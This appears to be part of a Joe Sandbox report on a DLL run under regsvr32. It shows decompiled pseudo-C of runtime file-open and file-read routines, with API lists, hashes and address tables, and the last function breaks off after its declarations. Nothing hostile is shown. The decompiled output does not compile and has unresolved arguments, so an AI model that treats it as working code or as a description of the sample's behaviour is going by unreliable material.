                          			E00007FF87FF88C08243C(signed int __ebx, void* __eflags, signed int __rbx, intOrPtr* __rcx, signed int* __rdx, signed int __rdi, void* __rsi, signed int __r8) {
                          				void* __rbp;
                          				signed int _t120;
                          				long _t134;
                          				void* _t137;
                          				void* _t139;
                          				void* _t140;
                          				signed int _t155;
                          				signed int _t156;
                          				signed char _t160;
                          				signed char _t161;
                          				void* _t185;
                          				void* _t186;
                          				signed int* _t207;
                          				intOrPtr* _t210;
                          				long long _t221;
                          				intOrPtr* _t229;
                          				signed long long _t237;
                          				intOrPtr _t251;
                          				signed long long _t252;
                          				signed long long _t272;
                          				signed long long _t273;
                          				signed int* _t278;
                          				void* _t281;
                          				void* _t282;
                          				signed int* _t284;
                          				void* _t285;
                          				void* _t293;
                          				void* _t295;
                          				void* _t300;
                          				void* _t303;
                          
                          				_t280 = __rsi;
                          				_t155 = __ebx;
                          				_t207 = _t284;
                          				_t207[2] = __rbx;
                          				_t207[4] = __rdi;
                          				_t207[6] = __r8;
                          				_t282 = _t207 - 0x47;
                          				_t285 = _t284 - 0xc0;
                          				r12d = r9d;
                          				r9d =  *(_t282 + 0x77);
                          				_t278 = __rdx;
                          				r8d =  *(_t282 + 0x6f);
                          				_t229 = __rcx;
                          				E00007FF87FF88C0820A8(r12d, __eflags, _t207, __rcx, _t282 - 1, _t282);
                          				asm("movups xmm0, [eax]");
                          				asm("movups xmm1, xmm0");
                          				asm("psrldq xmm1, 0x8");
                          				asm("dec cx");
                          				 *(_t282 - 0x11) = _t303 >> 0x20;
                          				asm("movups [ebp-0x59], xmm0");
                          				asm("movsd xmm0, [eax+0x10]");
                          				asm("movsd [ebp-0x31], xmm0");
                          				asm("movsd [ebp-0x49], xmm0");
                          				if (r15d != 0xffffffff) goto 0x8c0824c7;
                          				E00007FF87FF88C07E680(_t207);
                          				 *_t207 =  *_t207 & 0x00000000;
                          				 *__rdx =  *__rdx | 0xffffffff;
                          				E00007FF87FF88C07E6A0(_t207);
                          				goto 0x8c08280e;
                          				_t120 = E00007FF87FF88C083C80(r12d, _t185, _t207, _t229, _t282 - 1, __rdx, __rdx, __rsi);
                          				 *__rdx = _t120;
                          				if (_t120 != 0xffffffff) goto 0x8c0824eb;
                          				E00007FF87FF88C07E680(_t207);
                          				 *_t207 =  *_t207 & 0x00000000;
                          				 *__rdx =  *__rdx | 0xffffffff;
                          				E00007FF87FF88C07E6A0(_t207);
                          				 *_t207 = 0x18;
                          				goto 0x8c0824bb;
                          				 *(_t285 + 0x30) =  *(_t285 + 0x30) & 0x00000000;
                          				r8d = r15d;
                          				 *(_t282 - 0x21) =  *(_t282 - 0x21) & 0x00000000;
                          				 *_t229 = 1;
                          				_t231 =  *(_t282 - 0x49) >> 0x20;
                          				_t156 = _t155 |  *(_t282 - 0x49);
                          				 *(_t285 + 0x28) = _t156;
                          				 *((intOrPtr*)(_t285 + 0x20)) =  *((intOrPtr*)(_t282 - 0x51));
                          				 *(_t282 - 0x29) = 0x18;
                          				 *(_t282 - 0x19) =  !(r12d >> 7) & 0x00000001;
                          				 *(_t282 - 0x39) =  *(_t282 - 0x49) >> 0x20;
                          				CreateFileW(??, ??, ??, ??, ??, ??, ??);
                          				r14d =  *(_t282 - 0x55);
                          				 *(_t282 - 0x41) = _t207;
                          				if (_t207 != 0xffffffff) goto 0x8c0825df;
                          				if ((r14d & 0xc0000000) != 0xc0000000) goto 0x8c0825ac;
                          				if ((r12b & 0x00000001) == 0) goto 0x8c0825ac;
                          				 *(_t285 + 0x30) =  *(_t285 + 0x30) & 0x00000000;
                          				asm("inc ecx");
                          				 *(_t282 - 0x55) = r14d;
                          				r8d = r15d;
                          				 *(_t285 + 0x28) = _t156;
                          				 *((intOrPtr*)(_t285 + 0x20)) =  *((intOrPtr*)(_t282 - 0x51));
                          				CreateFileW(??, ??, ??, ??, ??, ??, ??);
                          				 *(_t282 - 0x41) = _t207;
                          				if (_t207 != 0xffffffff) goto 0x8c0825df;
                          				_t237 =  *__rdx;
                          				_t210 =  *((intOrPtr*)(0x8c0b4970 + (_t237 >> 6) * 8));
                          				 *(_t210 + (_t237 << 6) + 0x38) =  *(_t210 + (_t237 << 6) + 0x38) & 0x000000fe;
                          				E00007FF87FF88C07E630(GetLastError(), _t210,  *(_t282 - 0x49) >> 0x20);
                          				goto 0x8c0824bb;
                          				if (GetFileType(_t303) != 0) goto 0x8c08263d;
                          				_t134 = GetLastError();
                          				E00007FF87FF88C07E630(_t134, _t210,  *(_t282 - 0x49) >> 0x20);
                          				 *( *((intOrPtr*)(0x8c0b4970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x38) =  *( *((intOrPtr*)(0x8c0b4970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x38) & 0x000000fe;
                          				CloseHandle(_t300);
                          				if (_t134 != 0) goto 0x8c0824bb;
                          				_t137 = E00007FF87FF88C07E6A0(_t210);
                          				 *_t210 = 0xd;
                          				goto 0x8c0824bb;
                          				if (_t137 != 2) goto 0x8c08264a;
                          				goto 0x8c082652;
                          				if (_t137 != 3) goto 0x8c082652;
                          				_t160 =  *(_t282 - 0x59) | 0x48;
                          				E00007FF87FF88C083B9C(_t160,  *__rdx, _t186,  *(_t282 - 0x49) >> 0x20, _t207, __rdx, _t280, _t282, _t295, _t293);
                          				_t161 = _t160 | 0x00000001;
                          				 *(_t282 - 0x59) = _t161;
                          				 *( *((intOrPtr*)(0x8c0b4970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x38) = _t161;
                          				 *((char*)( *((intOrPtr*)(0x8c0b4970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x39)) = 0;
                          				if ((r12b & 0x00000002) == 0) goto 0x8c0826b4;
                          				_t139 = E00007FF87FF88C0822B4(_t161,  *__rdx, r12d & 0x0000003f,  *(_t282 - 0x49) >> 0x20, _t280);
                          				r13d = _t139;
                          				if (_t139 != 0) goto 0x8c0826e3;
                          				asm("movups xmm0, [ebp-0x59]");
                          				asm("movsd xmm1, [ebp-0x31]");
                          				r8d = r12d;
                          				asm("movaps [ebp-0x1], xmm0");
                          				 *((char*)(_t282 - 0x61)) = 0;
                          				asm("movsd [ebp+0xf], xmm1");
                          				_t140 = E00007FF87FF88C081E14( *_t278,  *(_t282 - 0x49) >> 0x20, _t282 - 1, _t280, _t282 - 0x61);
                          				if (_t140 == 0) goto 0x8c0826f2;
                          				r13d = _t140;
                          				E00007FF87FF88C085278( *_t278, r12d & 0x0000003f, _t185, _t140,  *((intOrPtr*)(0x8c0b4970 + ( *__rdx >> 6) * 8)),  *(_t282 - 0x49) >> 0x20, _t280);
                          				goto 0x8c08280e;
                          				 *((char*)( *((intOrPtr*)(0x8c0b4970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x39)) =  *((intOrPtr*)(_t282 - 0x61));
                          				_t272 =  *_t278;
                          				_t273 = _t272 << 6;
                          				_t251 =  *((intOrPtr*)(0x8c0b4970 + (_t272 >> 6) * 8));
                          				 *(_t251 + _t273 + 0x3d) =  *(_t251 + _t273 + 0x3d) & 0x000000fe;
                          				 *(_t251 + _t273 + 0x3d) =  *(_t251 + _t273 + 0x3d) | r12d >> 0x00000010 & 0x00000001;
                          				if ((_t161 & 0x00000048) != 0) goto 0x8c082759;
                          				if ((r12b & 0x00000008) == 0) goto 0x8c082759;
                          				_t252 =  *_t278;
                          				_t221 =  *((intOrPtr*)(0x8c0b4970 + (_t252 >> 6) * 8));
                          				 *(_t221 + (_t252 << 6) + 0x38) =  *(_t221 + (_t252 << 6) + 0x38) | 0x00000020;
                          				if ((r14d & 0xc0000000) != 0xc0000000) goto 0x8c08280c;
                          				if ((r12b & 0x00000001) == 0) goto 0x8c08280c;
                          				CloseHandle(_t281);
                          				 *(_t285 + 0x30) =  *(_t285 + 0x30) & 0x00000000;
                          				asm("inc ecx");
                          				r8d =  *(_t282 - 0x11);
                          				 *(_t285 + 0x28) = 0xc0000000;
                          				 *((intOrPtr*)(_t285 + 0x20)) =  *((intOrPtr*)(_t282 - 0x51));
                          				 *(_t282 - 0x55) = r14d;
                          				CreateFileW(??, ??, ??, ??, ??, ??, ??);
                          				if (_t221 != 0xffffffff) goto 0x8c0827f2;
                          				E00007FF87FF88C07E630(GetLastError(), _t221,  *(_t282 - 0x49) >> 0x20);
                          				 *( *((intOrPtr*)(0x8c0b4970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x38) =  *( *((intOrPtr*)(0x8c0b4970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x38) & 0x000000fe;
                          				E00007FF87FF88C083DB0(_t161,  *_t278, _t185, _t231, _t278, _t280);
                          				goto 0x8c0824bb;
                          				 *((long long*)( *((intOrPtr*)(0x8c0b4970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x28)) = _t221;
                          				return 0;
                          			}

































                          0x7ff88c08243c
                          0x7ff88c08243c
                          0x7ff88c08243c
                          0x7ff88c08243f
                          0x7ff88c082443
                          0x7ff88c082447
                          0x7ff88c082454
                          0x7ff88c082458
                          0x7ff88c08245f
                          0x7ff88c082465
                          0x7ff88c082469
                          0x7ff88c08246c
                          0x7ff88c082470
                          0x7ff88c08247a
                          0x7ff88c08247f
                          0x7ff88c082482
                          0x7ff88c082485
                          0x7ff88c08248a
                          0x7ff88c082493
                          0x7ff88c082497
                          0x7ff88c08249b
                          0x7ff88c0824a0
                          0x7ff88c0824a5
                          0x7ff88c0824ae
                          0x7ff88c0824b0
                          0x7ff88c0824b5
                          0x7ff88c0824b8
                          0x7ff88c0824bb
                          0x7ff88c0824c2
                          0x7ff88c0824c7
                          0x7ff88c0824cc
                          0x7ff88c0824d1
                          0x7ff88c0824d3
                          0x7ff88c0824d8
                          0x7ff88c0824db
                          0x7ff88c0824de
                          0x7ff88c0824e3
                          0x7ff88c0824e9
                          0x7ff88c0824eb
                          0x7ff88c0824ff
                          0x7ff88c082502
                          0x7ff88c082507
                          0x7ff88c082514
                          0x7ff88c08251a
                          0x7ff88c082520
                          0x7ff88c082524
                          0x7ff88c08252f
                          0x7ff88c082536
                          0x7ff88c082539
                          0x7ff88c08253d
                          0x7ff88c082543
                          0x7ff88c08254c
                          0x7ff88c082557
                          0x7ff88c082564
                          0x7ff88c08256a
                          0x7ff88c08256c
                          0x7ff88c082579
                          0x7ff88c08257e
                          0x7ff88c082582
                          0x7ff88c082589
                          0x7ff88c08258d
                          0x7ff88c082599
                          0x7ff88c08259f
                          0x7ff88c0825aa
                          0x7ff88c0825ac
                          0x7ff88c0825c4
                          0x7ff88c0825c8
                          0x7ff88c0825d5
                          0x7ff88c0825da
                          0x7ff88c0825ea
                          0x7ff88c0825ec
                          0x7ff88c0825f6
                          0x7ff88c082617
                          0x7ff88c08261f
                          0x7ff88c082627
                          0x7ff88c08262d
                          0x7ff88c082632
                          0x7ff88c082638
                          0x7ff88c082643
                          0x7ff88c082648
                          0x7ff88c08264d
                          0x7ff88c08264f
                          0x7ff88c082657
                          0x7ff88c082669
                          0x7ff88c082677
                          0x7ff88c08267e
                          0x7ff88c082697
                          0x7ff88c0826a0
                          0x7ff88c0826a4
                          0x7ff88c0826a9
                          0x7ff88c0826ae
                          0x7ff88c0826b4
                          0x7ff88c0826be
                          0x7ff88c0826c7
                          0x7ff88c0826ca
                          0x7ff88c0826ce
                          0x7ff88c0826d2
                          0x7ff88c0826d7
                          0x7ff88c0826de
                          0x7ff88c0826e0
                          0x7ff88c0826e5
                          0x7ff88c0826ed
                          0x7ff88c08270a
                          0x7ff88c08270e
                          0x7ff88c08271b
                          0x7ff88c08271f
                          0x7ff88c08272b
                          0x7ff88c082730
                          0x7ff88c082737
                          0x7ff88c08273d
                          0x7ff88c08273f
                          0x7ff88c082750
                          0x7ff88c082754
                          0x7ff88c082765
                          0x7ff88c08276f
                          0x7ff88c082778
                          0x7ff88c082786
                          0x7ff88c08278c
                          0x7ff88c082791
                          0x7ff88c082795
                          0x7ff88c08279c
                          0x7ff88c0827a4
                          0x7ff88c0827b0
                          0x7ff88c0827bd
                          0x7ff88c0827c7
                          0x7ff88c0827e1
                          0x7ff88c0827e8
                          0x7ff88c0827ed
                          0x7ff88c082807
                          0x7ff88c08282a

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                          • String ID:
                          • API String ID: 1330151763-0
                          • Opcode ID: 544f02e6fad5c1fd8408f698f3878f30c1ec09c20e745f70c9dbf413a5d11e2f
                          • Instruction ID: 8e2e99f6d23fc0251e32e76318ce310d972d86bf3edba8c9ce71367ddf844974
                          • Opcode Fuzzy Hash: 544f02e6fad5c1fd8408f698f3878f30c1ec09c20e745f70c9dbf413a5d11e2f
                          • Instruction Fuzzy Hash: 8DC1AE32B25A418AEF648F65D8513AC37A1FB4ABE8F015235DE2E5B799CF38D415C700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 86%
                          			E00007FF87FF88C085864(void* __ebx, signed int __ecx, void* __edx, void* __ebp, signed int* __rax, long long __rbx, long long __rdx, long long __r8) {
                          				void* _t118;
                          				unsigned int _t135;
                          				void* _t139;
                          				void* _t142;
                          				char _t154;
                          				char _t155;
                          				char _t156;
                          				void* _t181;
                          				long long _t186;
                          				long long _t220;
                          				intOrPtr _t221;
                          				signed short* _t235;
                          				signed int* _t238;
                          				char* _t241;
                          				signed short* _t250;
                          				signed long long _t255;
                          				signed long long _t256;
                          				signed long long _t261;
                          				DWORD* _t263;
                          				signed short* _t264;
                          				void* _t270;
                          				void* _t272;
                          				signed long long _t274;
                          				void* _t276;
                          				void* _t277;
                          				long long _t279;
                          				signed short* _t281;
                          				signed short* _t288;
                          				long _t292;
                          				void* _t294;
                          				void* _t297;
                          				void* _t299;
                          				char* _t301;
                          				char* _t302;
                          				char* _t303;
                          
                          				_t279 = __r8;
                          				 *((long long*)(_t276 + 0x18)) = __rbx;
                          				 *((long long*)(_t276 + 0x10)) = __rdx;
                          				_t277 = _t276 - 0x60;
                          				r12d = r8d;
                          				if (r13d != 0xfffffffe) goto 0x8c0858a5;
                          				E00007FF87FF88C07E680(__rax);
                          				 *__rax = 0;
                          				E00007FF87FF88C07E6A0(__rax);
                          				 *__rax = 9;
                          				goto 0x8c085cae;
                          				if (__ecx < 0) goto 0x8c085c97;
                          				_t181 = r13d -  *0x8c0b4d70; // 0x40
                          				if (_t181 >= 0) goto 0x8c085c97;
                          				_t3 = _t270 + 1; // 0x1
                          				r8d = _t3;
                          				 *((long long*)(_t277 + 0x48)) = __r8;
                          				_t274 = __ecx << 6;
                          				_t255 = __ecx >> 6;
                          				 *(_t277 + 0x40) = _t255;
                          				_t220 =  *((intOrPtr*)(0x8c0b4970 + _t255 * 8));
                          				if (( *(_t220 + _t274 + 0x38) & r8b) == 0) goto 0x8c085c97;
                          				if (r12d - 0x7fffffff <= 0) goto 0x8c085911;
                          				E00007FF87FF88C07E680(_t220);
                          				 *_t220 = 0;
                          				E00007FF87FF88C07E6A0(_t220);
                          				 *_t220 = 0x16;
                          				goto 0x8c085ca9;
                          				if (r12d == 0) goto 0x8c085c93;
                          				if (( *(_t220 + _t274 + 0x38) & 0x00000002) != 0) goto 0x8c085c93;
                          				_t186 = __rdx;
                          				if (_t186 == 0) goto 0x8c0858fa;
                          				r10d =  *((char*)(_t220 + _t274 + 0x39));
                          				 *((long long*)(_t277 + 0x38)) =  *((intOrPtr*)(_t220 + _t274 + 0x28));
                          				 *((intOrPtr*)(_t277 + 0xa0)) = r10b;
                          				if (_t186 == 0) goto 0x8c08596c;
                          				if (_t186 != 0) goto 0x8c085961;
                          				if ((r8b &  !r12d) == 0) goto 0x8c085976;
                          				r14d = r12d;
                          				goto 0x8c085a0c;
                          				if ((r8b &  !r12d) != 0) goto 0x8c085992;
                          				E00007FF87FF88C07E680(_t220);
                          				 *_t220 = 0;
                          				_t118 = E00007FF87FF88C07E6A0(_t220);
                          				 *_t220 = 0x16;
                          				E00007FF87FF88C07E580(_t118);
                          				goto 0x8c085b18;
                          				r14d = r12d;
                          				r14d = r14d >> 1;
                          				r14d =  <  ? 4 : r14d;
                          				E00007FF87FF88C07E154(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
                          				_t241 = _t220;
                          				E00007FF87FF88C07E114(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
                          				E00007FF87FF88C07E114(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
                          				_t301 = _t241;
                          				if (_t241 != 0) goto 0x8c0859db;
                          				E00007FF87FF88C07E6A0(_t220);
                          				 *_t220 = 0xc;
                          				E00007FF87FF88C07E680(_t220);
                          				 *_t220 = 8;
                          				goto 0x8c085b18;
                          				_t26 = _t255 + 1; // 0x1
                          				r8d = _t26;
                          				E00007FF87FF88C085D68(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)), _t255);
                          				_t256 =  *(_t277 + 0x40);
                          				r10b =  *((intOrPtr*)(_t277 + 0xa0));
                          				r8d = 1;
                          				 *((long long*)( *((intOrPtr*)(0x8c0b4970 + _t256 * 8)) + _t274 + 0x30)) = _t220;
                          				_t221 =  *((intOrPtr*)(0x8c0b4970 + _t256 * 8));
                          				 *((long long*)(_t277 + 0x50)) = _t301;
                          				r9d = 0xa;
                          				if (( *(_t221 + _t274 + 0x38) & 0x00000048) == 0) goto 0x8c085aa1;
                          				_t154 =  *((intOrPtr*)(_t221 + _t274 + 0x3a));
                          				if (_t154 == r9b) goto 0x8c085aa1;
                          				if (r14d == 0) goto 0x8c085aa1;
                          				 *_t301 = _t154;
                          				r14d = r14d - 1;
                          				_t302 = _t301 + _t279;
                          				 *((intOrPtr*)( *((intOrPtr*)(0x8c0b4970 + _t256 * 8)) + _t274 + 0x3a)) = r9b;
                          				if (r10b == 0) goto 0x8c085aa1;
                          				_t155 =  *((intOrPtr*)( *((intOrPtr*)(0x8c0b4970 + _t256 * 8)) + _t274 + 0x3b));
                          				if (_t155 == r9b) goto 0x8c085aa1;
                          				if (r14d == 0) goto 0x8c085aa1;
                          				 *_t302 = _t155;
                          				_t303 = _t302 + _t279;
                          				r14d = r14d - 1;
                          				 *((intOrPtr*)( *((intOrPtr*)(0x8c0b4970 + _t256 * 8)) + _t274 + 0x3b)) = r9b;
                          				if (r10b != r8b) goto 0x8c085aa1;
                          				_t156 =  *((intOrPtr*)( *((intOrPtr*)(0x8c0b4970 + _t256 * 8)) + _t274 + 0x3c));
                          				if (_t156 == r9b) goto 0x8c085aa1;
                          				if (r14d == 0) goto 0x8c085aa1;
                          				 *_t303 = _t156;
                          				r14d = r14d - 1;
                          				 *((intOrPtr*)( *((intOrPtr*)(0x8c0b4970 + _t256 * 8)) + _t274 + 0x3c)) = r9b;
                          				if (E00007FF87FF88C083EE4(r13d, 0,  *((intOrPtr*)(0x8c0b4970 + _t256 * 8))) == 0) goto 0x8c085b36;
                          				_t228 =  *((intOrPtr*)(0x8c0b4970 +  *(_t277 + 0x40) * 8));
                          				if (( *( *((intOrPtr*)(0x8c0b4970 +  *(_t277 + 0x40) * 8)) + _t274 + 0x38) & 0x00000080) == 0) goto 0x8c085b36;
                          				if (GetConsoleMode(_t299) == 0) goto 0x8c085b36;
                          				if ( *((char*)(_t277 + 0xa0)) != 2) goto 0x8c085b3b;
                          				r14d = r14d >> 1;
                          				r8d = r14d;
                          				 *(_t277 + 0x20) = _t270;
                          				if (ReadConsoleW(_t297, _t294, _t292, _t263, _t270) != 0) goto 0x8c085b2a;
                          				E00007FF87FF88C07E630(GetLastError(),  *((intOrPtr*)(0x8c0b4970 +  *(_t277 + 0x40) * 8)), _t241);
                          				E00007FF87FF88C07E114( *((intOrPtr*)(0x8c0b4970 +  *(_t277 + 0x40) * 8)), _t241);
                          				goto 0x8c085cb1;
                          				goto 0x8c085b76;
                          				 *((intOrPtr*)(_t277 + 0x48)) = sil;
                          				r8d = r14d;
                          				 *(_t277 + 0x20) = _t270;
                          				if (ReadFile(_t272, ??, ??, ??) == 0) goto 0x8c085c5d;
                          				if ( *((intOrPtr*)(_t277 + 0xb8)) - r12d > 0) goto 0x8c085c5d;
                          				if (( *( *((intOrPtr*)(0x8c0b4970 +  *(_t277 + 0x40) * 8)) + _t274 + 0x38) & 0x00000080) == 0) goto 0x8c085b1b;
                          				if ( *((char*)(_t277 + 0xa0)) == 2) goto 0x8c085bbf;
                          				_t261 = _t303 + _t279;
                          				 *(_t277 + 0x20) = _t292 >> 1;
                          				_t135 = E00007FF87FF88C085564(__ebx, r13d, _t263 + _t228 * 2 +  *((intOrPtr*)(_t277 + 0xb8)), _t261, _t263 + _t228 * 2 +  *((intOrPtr*)(_t277 + 0xb8)),  *((intOrPtr*)(_t277 + 0xa8)));
                          				goto 0x8c085b1b;
                          				if (_t135 == 0) goto 0x8c085c45;
                          				_t281 =  *((intOrPtr*)(_t277 + 0x50));
                          				_t250 = _t281;
                          				_t264 = _t281;
                          				_t288 =  &(_t281[_t135 >> 1]);
                          				if (_t281 - _t288 >= 0) goto 0x8c085c38;
                          				_t235 =  &(_t281[1]);
                          				r9d =  *_t250 & 0x0000ffff;
                          				if (r9w == 0x1a) goto 0x8c085c2f;
                          				if (r9w != 0xd) goto 0x8c085c18;
                          				if (_t235 - _t288 >= 0) goto 0x8c085c18;
                          				if ( *_t235 != 0xa) goto 0x8c085c18;
                          				 *_t264 = 0xa;
                          				goto 0x8c085c28;
                          				_t264[1] = r9w;
                          				if ( &(_t250[3]) - _t288 < 0) goto 0x8c085beb;
                          				goto 0x8c085c38;
                          				_t238 =  *((intOrPtr*)(0x8c0b4970 + _t261 * 8));
                          				 *(_t238 + _t274 + 0x38) =  *(_t238 + _t274 + 0x38) | 0x00000002;
                          				goto 0x8c085b1b;
                          				E00007FF87FF88C085334(r13d, _t135 + _t135,  *((intOrPtr*)(_t277 + 0x50)), _t135 + _t135 >> 1);
                          				goto 0x8c085bb8;
                          				if (GetLastError() != 5) goto 0x8c085c83;
                          				E00007FF87FF88C07E6A0(_t238);
                          				 *_t238 = 9;
                          				_t139 = E00007FF87FF88C07E680(_t238);
                          				 *_t238 = 5;
                          				goto 0x8c085b18;
                          				if (_t139 != 0x6d) goto 0x8c085b11;
                          				goto 0x8c085b1b;
                          				goto 0x8c085cb1;
                          				E00007FF87FF88C07E680(_t238);
                          				 *_t238 = 0xa;
                          				_t142 = E00007FF87FF88C07E6A0(_t238);
                          				 *_t238 = 9;
                          				return E00007FF87FF88C07E580(_t142) | 0xffffffff;
                          			}






































                          0x7ff88c085864
                          0x7ff88c085864
                          0x7ff88c085869
                          0x7ff88c085879
                          0x7ff88c085883
                          0x7ff88c08588a
                          0x7ff88c08588c
                          0x7ff88c085893
                          0x7ff88c085895
                          0x7ff88c08589a
                          0x7ff88c0858a0
                          0x7ff88c0858a9
                          0x7ff88c0858af
                          0x7ff88c0858b6
                          0x7ff88c0858bf
                          0x7ff88c0858bf
                          0x7ff88c0858c6
                          0x7ff88c0858ce
                          0x7ff88c0858d2
                          0x7ff88c0858dd
                          0x7ff88c0858e2
                          0x7ff88c0858eb
                          0x7ff88c0858f8
                          0x7ff88c0858fa
                          0x7ff88c0858ff
                          0x7ff88c085901
                          0x7ff88c085906
                          0x7ff88c08590c
                          0x7ff88c085914
                          0x7ff88c08591f
                          0x7ff88c085925
                          0x7ff88c085928
                          0x7ff88c085932
                          0x7ff88c08593d
                          0x7ff88c085945
                          0x7ff88c085950
                          0x7ff88c085955
                          0x7ff88c08595f
                          0x7ff88c085961
                          0x7ff88c085967
                          0x7ff88c085974
                          0x7ff88c085976
                          0x7ff88c08597b
                          0x7ff88c08597d
                          0x7ff88c085982
                          0x7ff88c085988
                          0x7ff88c08598d
                          0x7ff88c085992
                          0x7ff88c085995
                          0x7ff88c08599b
                          0x7ff88c0859a2
                          0x7ff88c0859a9
                          0x7ff88c0859ac
                          0x7ff88c0859b3
                          0x7ff88c0859b8
                          0x7ff88c0859be
                          0x7ff88c0859c0
                          0x7ff88c0859c5
                          0x7ff88c0859cb
                          0x7ff88c0859d0
                          0x7ff88c0859d6
                          0x7ff88c0859e0
                          0x7ff88c0859e0
                          0x7ff88c0859e4
                          0x7ff88c0859e9
                          0x7ff88c0859f5
                          0x7ff88c0859fd
                          0x7ff88c085a07
                          0x7ff88c085a0c
                          0x7ff88c085a12
                          0x7ff88c085a17
                          0x7ff88c085a22
                          0x7ff88c085a24
                          0x7ff88c085a2b
                          0x7ff88c085a30
                          0x7ff88c085a32
                          0x7ff88c085a35
                          0x7ff88c085a3c
                          0x7ff88c085a42
                          0x7ff88c085a4a
                          0x7ff88c085a50
                          0x7ff88c085a57
                          0x7ff88c085a5c
                          0x7ff88c085a5e
                          0x7ff88c085a69
                          0x7ff88c085a6c
                          0x7ff88c085a6f
                          0x7ff88c085a77
                          0x7ff88c085a7d
                          0x7ff88c085a84
                          0x7ff88c085a89
                          0x7ff88c085a8b
                          0x7ff88c085a99
                          0x7ff88c085a9c
                          0x7ff88c085aab
                          0x7ff88c085abd
                          0x7ff88c085ac6
                          0x7ff88c085ada
                          0x7ff88c085ae4
                          0x7ff88c085af3
                          0x7ff88c085af9
                          0x7ff88c085afc
                          0x7ff88c085b09
                          0x7ff88c085b13
                          0x7ff88c085b1e
                          0x7ff88c085b25
                          0x7ff88c085b34
                          0x7ff88c085b36
                          0x7ff88c085b48
                          0x7ff88c085b4b
                          0x7ff88c085b5b
                          0x7ff88c085b69
                          0x7ff88c085b8b
                          0x7ff88c085b95
                          0x7ff88c085ba5
                          0x7ff88c085bae
                          0x7ff88c085bb3
                          0x7ff88c085bba
                          0x7ff88c085bc6
                          0x7ff88c085bc8
                          0x7ff88c085bd0
                          0x7ff88c085bd6
                          0x7ff88c085bd9
                          0x7ff88c085be0
                          0x7ff88c085be2
                          0x7ff88c085beb
                          0x7ff88c085bf4
                          0x7ff88c085bfb
                          0x7ff88c085c00
                          0x7ff88c085c05
                          0x7ff88c085c0b
                          0x7ff88c085c16
                          0x7ff88c085c18
                          0x7ff88c085c2b
                          0x7ff88c085c2d
                          0x7ff88c085c2f
                          0x7ff88c085c33
                          0x7ff88c085c40
                          0x7ff88c085c53
                          0x7ff88c085c58
                          0x7ff88c085c66
                          0x7ff88c085c68
                          0x7ff88c085c6d
                          0x7ff88c085c73
                          0x7ff88c085c78
                          0x7ff88c085c7e
                          0x7ff88c085c86
                          0x7ff88c085c8e
                          0x7ff88c085c95
                          0x7ff88c085c97
                          0x7ff88c085c9c
                          0x7ff88c085c9e
                          0x7ff88c085ca3
                          0x7ff88c085cc8

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          • Opcode ID: aa8d70a267aed3f394d20313078fc58160d100e7809d47a18e30dfc31bf5e273
                          • Instruction ID: 1be1cf0e1b2bd76c995eb95add0aaf68eef64bf10bebb37d9e6714b23caf34cd
                          • Opcode Fuzzy Hash: aa8d70a267aed3f394d20313078fc58160d100e7809d47a18e30dfc31bf5e273
                          • Instruction Fuzzy Hash: 12C1E422A1C68286FE759F22D84027D6BD5FB92BC4F558135EA8E07399CF3CE841CB01
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 32%
                          			E003D1BFC(void* __ebx, void* __ecx, void* __edx, signed int __edi, void* __esi, signed int __ebp, void* __esp, long long* __rax, long long* __rbx, intOrPtr* __rcx, long long __rdx, void* __r8, void* __r9, void* __r11, long long* _a8, long long _a16, long long _a24, long long _a40, long long _a48) {
                          				long long _v72;
                          				char _v80;
                          				char _v88;
                          				long long _v96;
                          				char _v104;
                          				signed int _v112;
                          				long long _v120;
                          				long long _v128;
                          				signed int _v136;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				signed int _t63;
                          				signed int _t67;
                          				void* _t69;
